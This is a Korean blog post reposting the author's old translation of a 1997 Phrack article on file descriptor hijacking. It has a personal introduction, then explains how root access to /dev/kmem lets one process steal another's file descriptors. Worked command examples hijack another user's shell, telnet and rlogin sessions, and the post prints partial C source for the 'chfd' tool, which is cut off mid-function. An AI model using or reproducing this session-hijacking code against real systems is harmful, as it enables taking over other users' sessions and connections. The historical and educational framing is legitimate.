<!doctype html><html lang=en-us><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><title>pwd/posts/translate/phrack-magazine/vol7-issue51-fd-hijacking/</title><meta name=viewport content="width=device-width,initial-scale=1"><meta name=robots content="all,follow"><meta name=googlebot content="index,follow,snippet,archive"><link rel=stylesheet href=https://blog.younjinjeong.io/hugo-theme-console/css/terminal-0.7.1.min.css><link rel=stylesheet href=https://blog.younjinjeong.io/hugo-theme-console/css/animate-3.7.2.min.css><link rel=stylesheet href=https://blog.younjinjeong.io/hugo-theme-console/css/console.css><!--[if lt IE 9]><script src=https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js></script><script src=https://oss.maxcdn.com/respond/1.4.2/respond.min.js></script><![endif]--><meta property="og:title" content="Phrack magazine Vol7 Issue51 File Descriptor Hijacking"><meta property="og:description" content><meta property="og:type" content="article"><meta property="og:url" content="https://blog.younjinjeong.io/posts/translate/phrack-magazine/vol7-issue51-fd-hijacking/"><meta property="article:published_time" content="2021-03-07T16:21:21+08:00"><meta name=twitter:title content="Phrack magazine Vol7 Issue51 File Descriptor Hijacking"><meta name=twitter:description content="블로그 테스트용으로 올려보는 예전 번역 10년전 KHDP에서 번역했었던
File descriptor hijacking 에 대한 글이 생각나
구글링을 해 보았더니, 수정없이 그냥들 보고 있는게 많더라.
사실, FD Hijacking 정도 볼 것 같으면
고딩의 저 어설픈 번역을 수정 할 법도 한데 그냥들 보고 있다는 말이지 홀홀..
10년이 지난 지금, 아직도 저런 공격방법이 통할 지는 모르겠지만
그 시절, 열정만을 가지고 밤새워 번역하고 코드 테스트도 해보며
이땅에 리눅스 및 BSD가 창궐하기전 홀로 즐겼던 세상으로 다시 돌아가 본다."><link rel=stylesheet href=https://blog.younjinjeong.io/hugo-theme-console/css/xterm.css><script type=text/javascript src=https://blog.younjinjeong.io/hugo-theme-console/js/lib/jquery-3.1.1.slim.js></script><script src=https://blog.younjinjeong.io/hugo-theme-console/js/lib/xterm.js></script><body class=terminal><div class=container><h1>Connect Everything</h1><div class=terminal-nav><header class=terminal-logo><div class="logo terminal-prompt"><a href=https://blog.younjinjeong.io/ class=no-style>pwd</a>:~#
<a href=https://blog.younjinjeong.io/posts>posts</a>/<a href=https://blog.younjinjeong.io/posts/translate>translate</a>/<a href=https://blog.younjinjeong.io/posts/translate/phrack-magazine>phrack-magazine</a>/<a href=https://blog.younjinjeong.io/posts/translate/phrack-magazine/vol7-issue51-fd-hijacking>vol7-issue51-fd-hijacking</a>/</div></header><nav class=terminal-menu><ul vocab="https://schema.org/" typeof="BreadcrumbList"></ul></nav></div><div id=terminal><script src=https://blog.younjinjeong.io/hugo-theme-console/js/xterm-blog.js></script></div></div></body></head><body class=terminal><div class=container></div><div class=container><h1>Phrack magazine Vol7 Issue51 File Descriptor Hijacking</h1>Mar. 7, 2021<br><br><h3 id=블로그-테스트용으로-올려보는-예전-번역>블로그 테스트용으로 올려보는 예전 번역</h3><p>10년전 KHDP에서 번역했었던<br>File descriptor hijacking 에 대한 글이 생각나<br>구글링을 해 보았더니, 수정없이 그냥들 보고 있는게 많더라.</p><p>사실, FD Hijacking 정도 볼 것 같으면<br>고딩의 저 어설픈 번역을 수정 할 법도 한데 그냥들 보고 있다는 말이지 홀홀..</p><p>10년이 지난 지금, 아직도 저런 공격방법이 통할 지는 모르겠지만</p><p>그 시절, 열정만을 가지고 밤새워 번역하고 코드 테스트도 해보며<br>이땅에 리눅스 및 BSD가 창궐하기전 홀로 즐겼던 세상으로 다시 돌아가 본다.</p><p>그때가 그립다. 순수했고, 열정적이었던 열 여덟살&mldr;.<br>그 열정으로 서른 살을 살았더라면, 난 지금 무엇이 되어 있었을까.</p><p><strong>근데 이제 벌써 마흔</strong></p><p>어릴때 번역한거라 굉장히 허접스러우므로&mldr; 시간 되면 한번 다시 손보는 걸로. ㅋ</p><h3 id=시작>시작</h3><p>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;[ Pearls Of Wisdom ]&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-
Procrastination is the denial of death.
Lift with your leg, not your back.
&mdash;&mdash;[EOF</p><p>&mdash;&ndash;[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 05 of 17</p><p>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;[ File Descriptor Hijacking
&mdash;&mdash;&mdash;&mdash;&ndash;[ orabidoo <a href=mailto:odar@pobox.com>odar@pobox.com</a></p><h2 id=소개>소개</h2><p>우리는 종종 사용자의 권한을 넘어 root를 얻는 방법에 대한 tty hijacking에 대해
듣곤한다. 이것을 위한 Sys V의 스트림(STREAMS)을 사용한 전통적인 툴과 리눅스에서
loadable module을 사용하기위한 방법으로 본지의 50호에 특별히 소개된적이 있었다.</p><p>나는 remote 또는 local머신의 루트를 얻는 간단한 테크닉을 소개하고자 한다. 리눅스와
FreeBSD를 사용했다. : root가 kernel memory에 쓸수 있는 유닉스 비슷한 시스템이라면
어디서나 가능하다.</p><p>아이디어는 간단하다. :커널의 fd table을 약간 꼬아서, 하나의 프로세스에서 다른 프로세스로
fd를 강제적으로 옮기는 것이다.</p><p>이 방법은 당신이 할 수있는 거의 모든일을 가능하게 한다. : 실행되고있는 커맨드의 output을
파일로 리다이렉션 시킨다든지, 당신의 이웃의 텔넷 커넥션에서 까지도 가능하다.</p><h2 id=커널은-어떻게-열린-fd의-track을-지키는가>커널은 어떻게 열린 fd의 track을 지키는가.</h2><p>유닉스에서, 프로세스가 fd로 이루어진 자원에 접근하는 방법은 open(),socket(),pipe()
들과 같은 시스템 콜로서 가능하다. 프로세스의 관점에서 보면 , fd는 리소스에 대한
불투명한 핸들이다. fd의 0,1,2는 각각 표준 입력, 출력, 에러를 나타낸다. 새로운
descriptor는 항상 시퀀스에 올로케이트 되어있다.</p><p>펜스(fense)의 다른면에서, 커널이 지키고, 서로다른 프로세스간에 fd table은 각 fd
structure로의 포인터로 이루어진다. fd가 열려있지 않으면 포인터는 NULL이다. 반면에,
structure는 fd자체에 대한 종류(file, socket, pipe, etc&mldr;)에 대한 정보를 가지고
있으며, fd access에 대한 자원(파일의 inode, 소켓의 주소와 상태정보 등등..)의 데이터에
대한 포인터를 함께 가지고 있다.</p><p>보통 프로세스 테이블은 링크된 스트럭쳐의 리스트 또는 배열(array)로 구성되어있다. 주어진
프로세스를 위한 스트럭쳐에서부터, 당신은 그 프로세스에 대한 내부의 fd테이블을 손쉽게
찾을수 있을 것이다.</p><p>리눅스에서, 프로세스 테이블은 task_struct의 구조체 배열(&ldquo;task"로 불려지는)이며, 구조체
files_struct로의 fd배열을 가진(/usr/include/linux/sched.h 참조) 포인터를 포함하고
있다. SunOS 4에서 프로세스 테이블은 fd들에 대한 정보를 가지고 있는 u_area로의 포인터를
포함한 스트럭트 proc&rsquo;s의 링크드 리스트이다. FreeBSD에서 역시 allproc라 불리는 스트럭트
proc&rsquo;s의 링크드 리스트이며, 그것은 fd테이블을 포함한 구조체 filedesc로의 포인터를 가진다.
(/usr/include/sys/proc.h 참조)</p><p>만약 커널 메모리에 쓰기 또는 읽기 access를 가지고 있다면(대부분 이것은 /dev/kmem
을 읽거나 쓰는것과 같다.) fd테이블들의 잡탕속에서 열려진 fd를 프로세스에서 훔치는 것과,
다른 프로세스에서 재사용하는것을 방해할것은 아무것도 없다.</p><p>이것은 보안레벨 0등급이상에서 돌아가는 BSD4.4(BSD)와 같은 시스템에서는
동작하지 않는다. 저런 모드에서는 /dev/kmem, /dev/mem과 같은 곳으로의 접근이 불가능하다.
그러나 많은 BSD시스템들은 약점이 있는 보안등급 -1에서 동작하며, StartUP스크립트를
조작하여 다음번 재부팅때 보안등급을 -1로 끌어내리는것도 가능할 수 있다. FreeBSD에서는
&ldquo;sysct | kern.securelevel"명령어로 보안등급을 확인할수 있다. 리눅스역시 보안등급을
가지고는 있지만, 리눅스는 /dev/kmem으로의 접근을 방해하지는 않을 것이다.</p><h2 id=file-descriptor-hijacking>File descriptor Hijacking</h2><p>커널 내부의 변수들은 사용자 프로그램에 의해 수정될 수 없다.</p><p>첫째로, 멀티 태스킹 시스템에서 당신은 변수의 주소를 찾아내고, 그 값을 바꾸는 사이에
커널의 상태가 바뀌지 않는데 대한 아무런 잇점(guarantee)이 없다. 이것은 우리가 왜 이
기술을 확실성에 목적을 둔 프로그램들에서 사용되어 질 수 없는지를 보여준다. 말했듯이,
연습에서 난 실패한적이 없다. 왜냐하면 커널은 한번 할당되어진 (최소한 처음 20,32,64&mldr;
프로세스당 fd) 이러한 종류의 데이터를 옮기지 않으며, 프로세스가 닫히거나 새로 fd를
만들어 열때 시도하는것은 거의 불가능하다.</p><p>First of all, on a multitasking system, you have no guarantee that the
kernel&rsquo;s state won&rsquo;t have changed between the time you find out a
variable&rsquo;s address and the time you write to it (no atomicity). This is
why these techniques shouldn&rsquo;t be used in any program that aims for
reliability. That being said, in practice, I haven&rsquo;t seen it fail, because
the kernel doesn&rsquo;t move this kind of data around once it has allocated it
(at least for the first 20 or 32 or 64 or so fds per process), and because
it&rsquo;s quite unlikely that you&rsquo;ll do this just when the process is closing or
opening a new fd. &mdash;- 아리송해서 원문도 같이 붙여봅니당. ^^;;</p><p>You still want to try it?</p><p>단순한 목적을 위해, 우리는 두 프로세스간의 fd복제 또는 한 프로세스에서 다른 프로세스로
리턴값이 없는 프로세스로의 fd passing을 시도하지는 않을 것이다.
대신, 우리는 프로세스의 fd를 다른 프로세스의 fd와 교환할것이다. 이 방법은 우리가
열려진 파일과 거래할수 있는 유일한 방법이며, 카운트 참조와 같은 방법은 사용하지 않을
것이다. 이것은 가능한 한 간단하게 커널안에서 두개의 포인터를 찾아내고, 그것들을
교환할 것이다. 약간 더 복잡한 버젼은 fd에 대한 3개의 포로세스와 원형순열(교환)을
포함한다.</p><p>당연히, 당신은 바꾸고자하는 fd에 일치할만한 리소스를 추측해서 알아내야만 한다. 실행되고
있는 쉘의 완벽한 제어를 위해 당신은 표준입력, 출력, 에러를 원할것이며, 또 0,1,2로 불리는
이 세가지 fd들을 취해야 할 필요가 있다.할 필요가 있다. 또, 당신은 텔넷 세션을 제어하기
위해 텔넷이 인터넷의 다른 쪽과 대화하기위해 사용하는 inet socket의 fd를(주로 3)
원할 것이며, 동작하는 다른 텔넷과 fd를 교환 할 것이다. 리눅스에서는 /proc/[pid]/fd
에서 프로세스가 사용하는 fd를 얻을수 있다.</p><h2 id=using-chfd>Using chfd</h2><p>마무리를 위한 도구로서 linux와 FreeBSD를 가지고 있다. 그것은 공평하게 다른 시스템으로 t쉽게 옮겨(포팅되어) 질 수 있다.</p><p>리눅스에서 chfd를 컴파일 하기 위해서는 리눅스 커널의 동작에 대해 몇가지 이해해야
할것들이 있다. 만약 1.2.13이나 그 비슷한 것이라면, /* #define OLDLINUX */의 주석을
지워야 할 필요가 있는데, 왜냐하면 커널의 구조가 그때 부터 바뀌었기 때문이다. 만약 2.0.0
이나 그 이상이라면 다시 바뀔 수 있을 지라도 box의 바깥쪽에서도 동작할것이다.</p><p>그리고 커널에서 심볼테이블을 찾아야 할 필요가 있는데, 그것은 아마 /boot/System.map또는
그 비슷한데 있을 것이다. 이것은 실제 동작하고 있는 커널에 대해 일치한다는것을 확인해야
한다.</p><p>그리고 &ldquo;take&rdquo; 심볼의 주소를 뒤져봐야 할것이다. 이 값을 &ldquo;00192d28"대신에 chfd에 넣어
주어야 한다. 그리고 &ldquo;gcc chfd.c -o chfd"명령과 함께 컴파일 하라.</p><p>FreeBSD에서 컴파일 하기 위해서는 단지 FreeBSD 코드를 얻은후에 &ldquo;gcc chfd.c. -o chfd -lkvm"명령과 함께 컴파일 하면 된다. 이 코드는 FreeBSD 2.2.1 에서 작성 되었으며, 다른 버젼을 위해 좀 만져줘야 할 수도 있다.</p><p>컴파일 된후에, chfd를 다음과 같이 실행한다.</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ chfd pid1 fd1 pid2 fd2
<span style=color:#75715e># 또는,</span>
$ chfd pid1 fd1 pid2 fd2 pid3 fd3
</code></pre></div><p>첫번째 경우, fd는 단지 교환(swap)되었을 뿐이다. 두번째는 두번째 프로세스가 첫번째의
fd를 얻고, 세번째(프로세스)가 두번째의 fd를 얻으며, 첫번째가 세번째의 fd를 얻어낸다.</p><p>특별한 경우로, pid중의 하나가 0일 경우에 일치하는 fd가 버려지며, 그것 대신 /dev/null
값이 fd에 pass된다.</p><h2 id=example-1>Example 1</h2><p>. pid 207 이 긴 계산을 하며, tty로 output 되는 경우.<br>. 당신이 &ldquo;cat > somefile"을 실행시키고, 그것의 pid를 조사 했을 경우(1746)</p><p>그렇다면</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ chfd <span style=color:#ae81ff>207</span> <span style=color:#ae81ff>1</span> <span style=color:#ae81ff>1746</span> <span style=color:#ae81ff>1</span>
</code></pre></div><p>이것은 그 계산을 &ldquo;somefile"이란 파일로 리다이렉션 시킬것이며, 그 계산이 돌아가고있는 tty를 화면에 출력할 것이다. 그러면 ^C 로 화면에 출력되는 중요한 계산의 결과값에 대한 두려움 없이 실행을 중지할수 있다.</p><h2 id=example-2>Example 2</h2><p>. 누군가 tty에서 bash의 복사본을 pid 4022로 돌리고 있을때.<br>. 당신이 tty에서 bash의 또다른 복사본을 pid 4121로 돌리고 있을때.</p><p>그러면</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>sleep <span style=color:#ae81ff>10000</span>
<span style=color:#75715e># 당신의 bash에서 실행하면 당분간 tty에서 읽지 않을 것이다.</span>
<span style=color:#75715e># 그렇지 않으면 당신의 쉘은 /dev/null 로부터 EOF를 취한후에 죽을 것이다.</span>
<span style=color:#75715e># 그 세션은 즉시,</span>

$ chfd <span style=color:#ae81ff>4022</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>4121</span> <span style=color:#ae81ff>0</span>
$ chfd <span style=color:#ae81ff>4022</span> <span style=color:#ae81ff>1</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>4121</span> <span style=color:#ae81ff>1</span>
$ chfd <span style=color:#ae81ff>4022</span> <span style=color:#ae81ff>2</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>4121</span> <span style=color:#ae81ff>2</span>

</code></pre></div><p>그리고 다른사람의 키 입력을 /dev/null로 보내는 동안에 bash와 output의 제어를 찾아라.
당신이 쉘을 떠날때, 그는 그의 세션이 연결종료 됬다는것을 알아내고, 당신은 ^C로 당신의
sleep를 죽이면 안전해 질수 있다.</p><p>다른 쉘들은 아마 다른 fd를 사용할 것이다. zsh는 tty로 부터 읽어 들일때 fd 10을
사용하는것 같은데, 그에 따라 직접 바꿔 줄 필요가 있을 것이다.</p><h2 id=example-3>Example 3</h2><p>. 누군가 pid 6309로 tty에서 텔넷을 실행 시키고 있을때.<br>. 당신이 pid 7081로 텔넷을 중요하지 않은 포트로 너무 빨리 드롭 되지 않도록 실행 시킬때.
(telnet localhost 7, telnet www.yourdomain 80, 기타 등등)<br>. 리눅스에서, 빠르게 /proc/6309/fd 와 /proc/7081/fd 를 살펴보면 텔넷이 사용하고 있는
fd 0, 1,2,3( 3은 분명 그 커넥션일 것이다.)를 알수 있을 것이다.</p><p>그러면</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ chfd <span style=color:#ae81ff>6309</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>7081</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>0</span> <span style=color:#ae81ff>0</span>
</code></pre></div><p>이것은 그 다른 사람의 텔넷 커넥션을 /dev/null 로 보낼것이다. (다른 사용자의 텔넷은 EOF를
읽어 &ldquo;Connection closed by foreign host.&ldquo;라는 메세지를 볼것이다.) 그리고 당신의
텔넷은 스스로 그 다른 사용자의 리모트 호스트에 연결될 것이다. 이 시점에서 당신의 텔넷이
연결 위치에 echo를 멈추도록 하기 위해 당신은 아마도 ^]를 누르고 &ldquo;mode character"를
칠것이다.</p><h2 id=example-4>Example 4</h2><p>. 누군가 tty에서 rlogin를 돌리고 있을 경우. " 각자의 rlogin이 pid 4547과 4548를
쓰고 있을때.<br>. 당신은 다른 tty에서 pid 4852와 pid 4855로 rlogin localhost 을 돌리고,<br>. /proc/../fds 와 관련된 것들을 빠르게 살펴봄으로서 rlogin 프로세스가 커넥션을 위해
fd 3을 쓰고 있다는것을 알아 냈을때.</p><p>그렇다면,</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>chfd <span style=color:#ae81ff>4547</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>4852</span> <span style=color:#ae81ff>3</span> <span style=color:#f92672>(</span>원문에서는 이부분이 chfd <span style=color:#ae81ff>4547</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>4552</span> 3<span style=color:#f92672>)</span>
chfd <span style=color:#ae81ff>4548</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>4855</span> <span style=color:#ae81ff>3</span> <span style=color:#f92672>(</span>역시 chfd <span style=color:#ae81ff>4548</span> <span style=color:#ae81ff>3</span> <span style=color:#ae81ff>4555</span> 3<span style=color:#f92672>)</span>
</code></pre></div><p>당신의 rlogin이 일어날수 없는 이벤트(localhost로부터 데이터를 읽는것)를 기다리는
것때문에 커널에 의해 당신의 rlogin이 아직 막혀 있는 경우를 제외하고 이것은 당신이
기대한대로 동작할 것이다. 이러한 경우, &lsquo;fg&rsquo;에 따라 kill -STOP을 실행 시킴으로서
다시 rlogin을 깨울수 있다.</p><p>당신은 아이디어를 얻었다. 프로그램이 다른 프로그램의 fd를 얻는 동안 그것을 가지고
무엇을 해야할지 아는것은 중요하다. 대부분의 경우 당신은 같은 프로그램의 복사본을
실행시키는 것으로 ,만약 /dev/null, stdin/stdout/stderr로 fd를 패스 하지
않는한, 당신이 원하는것을 얻을수 있을 것이다.</p><h2 id=conclusion>Conclusion</h2><p>당신도 보았듯이, 이걸 가지고 꽤 무서운 짓을 할수 있다. 그리고 루트가 이것을 돌리는
것으로 부터 당신 자신을 보호하는 것 또한 정말 어렵다.</p><p>이것은 보안 구멍 조차 아니라는 점에서 논의 될수있다. 이 짓들이 가능하기 위해선
루트가 <em>필요</em>하다. 반면에 /dev/kmem의 드라이버 코드 안에 당신이 /dev/kmem에
쓰도록(write) 할 수 있는 명백한 코드는 없을것이다. 그렇지 않은가?</p><h2 id=the-linux-code>The Linux code</h2><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=color:#f92672>&lt;++&gt;</span> fd_hijack<span style=color:#f92672>/</span>chfd<span style=color:#f92672>-</span>linux.c
<span style=color:#75715e>/*  chfd - exchange fd&#39;s between 2 or 3 running processes.
</span><span style=color:#75715e> *  
</span><span style=color:#75715e> *  This was written for Linux/intel and is *very* system-specific.
</span><span style=color:#75715e> *  Needs read/write access to /dev/kmem; setgid kmem is usually enough.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3]
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  With two sets of arguments, exchanges a couple of fd between the 
</span><span style=color:#75715e> *  two processes.
</span><span style=color:#75715e> *  With three sets, the second process gets the first&#39;s fd, the third gets
</span><span style=color:#75715e> *  the second&#39;s fd, and the first gets the third&#39;s fd.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Note that this is inherently unsafe, since we&#39;re messing with kernel
</span><span style=color:#75715e> *  variables while the kernel itself might be changing them.  It works
</span><span style=color:#75715e> *  in practice, but no self-respecting program would want to do this.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Written by: orabidoo &lt;odar@pobox.com&gt;
</span><span style=color:#75715e> *  First version: 14 Feb 96
</span><span style=color:#75715e> *  This version: 2 May 97
</span><span style=color:#75715e> */</span>

 <span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;stdio.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;unistd.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;fcntl.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#define __KERNEL__		</span><span style=color:#75715e>/* needed to access kernel-only definitions */</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;linux/sched.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e></span>
<span style=color:#75715e>/* #define OLDLINUX */</span>		<span style=color:#75715e>/* uncomment this if you&#39;re using Linux 1.x;
</span><span style=color:#75715e>				   tested only on 1.2.13 */</span>

<span style=color:#75715e>#define TASK 0x00192d28		</span><span style=color:#75715e>/* change this! look at the system map,
</span><span style=color:#75715e>				   usually /boot/System.map, for the address
</span><span style=color:#75715e>				   of the &#34;task&#34; symbol */</span><span style=color:#75715e>
</span><span style=color:#75715e></span>
<span style=color:#75715e>#ifdef OLDLINUX
</span><span style=color:#75715e>#  define FD0 ((char *)&amp;ts.files-&gt;fd[0] - (char *)&amp;ts)
</span><span style=color:#75715e>#  define AD(fd) (taskp + FD0 + 4*(fd))
</span><span style=color:#75715e>#else
</span><span style=color:#75715e>#  define FILES ((char *)&amp;ts.files - (char *)&amp;ts)
</span><span style=color:#75715e>#  define FD0 ((char *)&amp;fs.fd[0] - (char *)&amp;fs)
</span><span style=color:#75715e>#  define AD(fd) (readvalz(taskp + FILES) + FD0 + 4*(fd))
</span><span style=color:#75715e>#endif
</span><span style=color:#75715e></span>

<span style=color:#66d9ef>int</span> kfd;
<span style=color:#66d9ef>struct</span> task_struct ts;
<span style=color:#66d9ef>struct</span> files_struct fs;
<span style=color:#66d9ef>int</span> taskp;

<span style=color:#66d9ef>int</span> <span style=color:#a6e22e>readval</span>(<span style=color:#66d9ef>int</span> ad) {
  <span style=color:#66d9ef>int</span> val, r;

  <span style=color:#66d9ef>if</span> (lseek(kfd, ad, SEEK_SET) <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
    perror(<span style=color:#e6db74>&#34;lseek&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>if</span> ((r <span style=color:#f92672>=</span> read(kfd, <span style=color:#f92672>&amp;</span>val, <span style=color:#ae81ff>4</span>)) <span style=color:#f92672>!=</span> <span style=color:#ae81ff>4</span>) {
    <span style=color:#66d9ef>if</span> (r <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
      perror(<span style=color:#e6db74>&#34;read&#34;</span>);
    <span style=color:#66d9ef>else</span> fprintf(stderr, <span style=color:#e6db74>&#34;Error reading...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
    exit(<span style=color:#ae81ff>1</span>);
  }
  <span style=color:#66d9ef>return</span> val;
}

<span style=color:#66d9ef>int</span> <span style=color:#a6e22e>readvalz</span>(<span style=color:#66d9ef>int</span> ad) {
  <span style=color:#66d9ef>int</span> r <span style=color:#f92672>=</span> readval(ad);
  <span style=color:#66d9ef>if</span> (r <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;NULL pointer found (fd not open?)</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>return</span> r;
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>writeval</span>(<span style=color:#66d9ef>int</span> ad, <span style=color:#66d9ef>int</span> val) {
  <span style=color:#66d9ef>int</span> w;

  <span style=color:#66d9ef>if</span> (lseek(kfd, ad, SEEK_SET) <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
    perror(<span style=color:#e6db74>&#34;lseek&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>if</span> ((w <span style=color:#f92672>=</span> write(kfd, <span style=color:#f92672>&amp;</span>val, <span style=color:#ae81ff>4</span>)) <span style=color:#f92672>!=</span> <span style=color:#ae81ff>4</span>) {
    <span style=color:#66d9ef>if</span> (w <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
      perror(<span style=color:#e6db74>&#34;write&#34;</span>);
    <span style=color:#66d9ef>else</span> fprintf(stderr, <span style=color:#e6db74>&#34;Error writing...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
    exit(<span style=color:#ae81ff>1</span>);
  }
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>readtask</span>(<span style=color:#66d9ef>int</span> ad) {
  <span style=color:#66d9ef>int</span> r;

  <span style=color:#66d9ef>if</span> (lseek(kfd, ad, SEEK_SET)<span style=color:#f92672>&lt;</span><span style=color:#ae81ff>0</span>)
    perror(<span style=color:#e6db74>&#34;lseek&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>if</span> ((r <span style=color:#f92672>=</span> read(kfd, <span style=color:#f92672>&amp;</span>ts, <span style=color:#66d9ef>sizeof</span>(<span style=color:#66d9ef>struct</span> task_struct))) <span style=color:#f92672>!=</span>
	<span style=color:#66d9ef>sizeof</span>(<span style=color:#66d9ef>struct</span> task_struct)) {
    <span style=color:#66d9ef>if</span> (r <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
      perror(<span style=color:#e6db74>&#34;read&#34;</span>);
    <span style=color:#66d9ef>else</span> fprintf(stderr, <span style=color:#e6db74>&#34;Error reading...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
    exit(<span style=color:#ae81ff>1</span>);
  }
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>findtask</span>(<span style=color:#66d9ef>int</span> pid) {
  <span style=color:#66d9ef>int</span> adr;

  <span style=color:#66d9ef>for</span> (adr<span style=color:#f92672>=</span>TASK; ; adr<span style=color:#f92672>+=</span><span style=color:#ae81ff>4</span>) {
    <span style=color:#66d9ef>if</span> (adr <span style=color:#f92672>&gt;=</span> TASK <span style=color:#f92672>+</span> <span style=color:#ae81ff>4</span><span style=color:#f92672>*</span>NR_TASKS)
      fprintf(stderr, <span style=color:#e6db74>&#34;Process not found</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
    taskp <span style=color:#f92672>=</span> readval(adr);
    <span style=color:#66d9ef>if</span> (<span style=color:#f92672>!</span>taskp) <span style=color:#66d9ef>continue</span>;
    readtask(taskp);
    <span style=color:#66d9ef>if</span> (ts.pid <span style=color:#f92672>==</span> pid) <span style=color:#66d9ef>break</span>;
  }
}

<span style=color:#66d9ef>int</span> <span style=color:#a6e22e>main</span>(<span style=color:#66d9ef>int</span> argc, <span style=color:#66d9ef>char</span> <span style=color:#f92672>**</span>argv) {
  <span style=color:#66d9ef>int</span> pid1, fd1, pid2, fd2, ad1, val1, ad2, val2, pid3, fd3, ad3, val3;
  <span style=color:#66d9ef>int</span> three<span style=color:#f92672>=</span><span style=color:#ae81ff>0</span>;

  <span style=color:#66d9ef>if</span> (argc <span style=color:#f92672>!=</span> <span style=color:#ae81ff>5</span> <span style=color:#f92672>&amp;&amp;</span> argc <span style=color:#f92672>!=</span> <span style=color:#ae81ff>7</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, argv[<span style=color:#ae81ff>0</span>]), 
    exit(<span style=color:#ae81ff>1</span>);

  pid1 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>1</span>]), fd1 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>2</span>]);
  pid2 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>3</span>]), fd2 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>4</span>]);
  <span style=color:#66d9ef>if</span> (argc <span style=color:#f92672>==</span> <span style=color:#ae81ff>7</span>)
    pid3 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>5</span>]), fd3 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>6</span>]), three<span style=color:#f92672>=</span><span style=color:#ae81ff>1</span>;

  <span style=color:#66d9ef>if</span> (pid1 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    pid1 <span style=color:#f92672>=</span> getpid(), fd1 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);
  <span style=color:#66d9ef>if</span> (pid2 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    pid2 <span style=color:#f92672>=</span> getpid(), fd2 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);
  <span style=color:#66d9ef>if</span> (three <span style=color:#f92672>&amp;&amp;</span> pid3 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
